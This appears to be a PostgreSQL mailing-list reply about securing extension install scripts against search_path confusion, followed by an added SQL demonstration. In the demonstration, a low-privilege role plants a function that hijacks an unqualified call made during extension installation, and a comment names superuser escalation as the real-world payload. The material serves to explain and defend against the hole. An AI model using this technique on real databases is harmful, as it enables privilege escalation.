Re: Extension security improvement: Add support for extensions with an owned schema - Mailing list pgsql-hackers

From Robert Haas
Subject Re: Extension security improvement: Add support for extensions with an owned schema
Date
Msg-id CA+TgmoZEqpXGdzMNW99UGPhXa8TKu5eNCBu6doAu9T3ti3P1ow@mail.gmail.com
In response to Extension security improvement: Add support for extensions with an owned schema  (Jelte Fennema-Nio <me@jeltef.nl>)
Responses Re: Extension security improvement: Add support for extensions with an owned schema
Re: Extension security improvement: Add support for extensions with an owned schema
List pgsql-hackers
On Sat, Jun 1, 2024 at 8:08 PM Jelte Fennema-Nio <me@jeltef.nl> wrote:
> Writing the sql migration scripts that are run by CREATE EXTENSION and
> ALTER EXTENSION UPDATE are security minefields for extension authors.
> One big reason for this is that search_path is set to the schema of the
> extension while running these scripts, and thus if a user with lower
> privileges can create functions or operators in that schema they can do
> all kinds of search_path confusion attacks if not every function and
> operator that is used in the script is schema qualified. While doing
> such schema qualification is possible, it relies on the author to never
> make a mistake in any of the sql files. And sadly humans have a tendency
> to make mistakes.

I agree that this is a problem. I also think that the patch might be a
reasonable solution (but I haven't reviewed it).

But I wonder if there might also be another possible approach: could
we, somehow, prevent object references in extension scripts from
resolving to anything other than the system catalogs and the contents
of that extension? Perhaps with a control file setting to specify a
list of trusted extensions which we're also allowed to reference?

I have a feeling that this might be pretty annoying to implement, and
if that is true, then never mind. But if it isn't that annoying to
implement, it would make a lot of unsafe extensions safe by default,
without the extension author needing to take any action. Which could
be pretty cool. It would also make it possible for extensions to
safely share a schema, if desired.

--
Robert Haas
EDB: http://www.enterprisedb.com
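The search_path confusion that the quoted message describes can be reproduced in a few statements. The following is an added illustration, not code from the thread or from the proposed patch; it assumes an extension schema named ext, a low-privilege role named lowpriv that has been granted CREATE on that schema, and a placeholder custom GUC foo.hijacked used only to prove the planted function ran. The mechanism is the one behind CVE-2018-1058: pg_catalog is searched first implicitly, but a function in the extension schema whose argument types match the call exactly beats a pg_catalog candidate that needs an implicit cast.

```sql
-- Constructed demonstration of search_path confusion in an extension script.
-- Assumed setup (performed by a superuser): schema "ext" into which an
-- extension will later be installed, and a low-privilege role that can
-- create objects in it (as happens, for example, when an extension is
-- installed into a schema where PUBLIC has CREATE).
CREATE SCHEMA ext;
CREATE ROLE lowpriv;
GRANT USAGE, CREATE ON SCHEMA ext TO lowpriv;

-- Attacker step: lowpriv plants a function whose signature is a closer
-- match than pg_catalog's for a call the extension script makes.
-- pg_catalog.lower(text) needs a varchar->text cast; ext.lower(varchar)
-- is an exact match, so it wins even though pg_catalog is searched first.
SET ROLE lowpriv;
CREATE FUNCTION ext.lower(varchar) RETURNS text
LANGUAGE plpgsql AS $$
BEGIN
  -- This body executes with the privileges of the caller, i.e. the
  -- superuser running CREATE EXTENSION.  Recording the caller in a
  -- placeholder GUC stands in for what a real attacker would do here
  -- (e.g. ALTER ROLE lowpriv SUPERUSER).
  PERFORM pg_catalog.set_config('foo.hijacked', current_user::text, false);
  RETURN pg_catalog.lower($1::text);
END
$$;
RESET ROLE;

-- What CREATE EXTENSION / ALTER EXTENSION UPDATE effectively do: run the
-- script with search_path set to the extension's schema.
SET search_path = ext;

-- A line an extension author might write, unqualified: this resolves to
-- the attacker's ext.lower(varchar) rather than pg_catalog.lower(text).
SELECT lower('Abc'::varchar);

-- Shows which role executed the planted function body.
SELECT current_setting('foo.hijacked');

-- The schema-qualified form the author must remember for every function
-- and operator in every script; one omission anywhere re-opens the hole.
SELECT pg_catalog.lower('Abc'::varchar);

-- The same trick works for operators: OPERATOR(pg_catalog.=) in place of
-- a bare = forces resolution to the catalog operator.
SELECT 'a'::varchar OPERATOR(pg_catalog.=) 'a'::varchar;
```

The point of the example is the asymmetry the message complains about: the attacker needs one CREATE FUNCTION in the right schema, while the defender needs a qualification on every reference in every migration script, which is why both the owned-schema patch and the proposed "resolve only to the catalog and the extension itself" alternative try to remove the extension schema from the resolution path instead.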
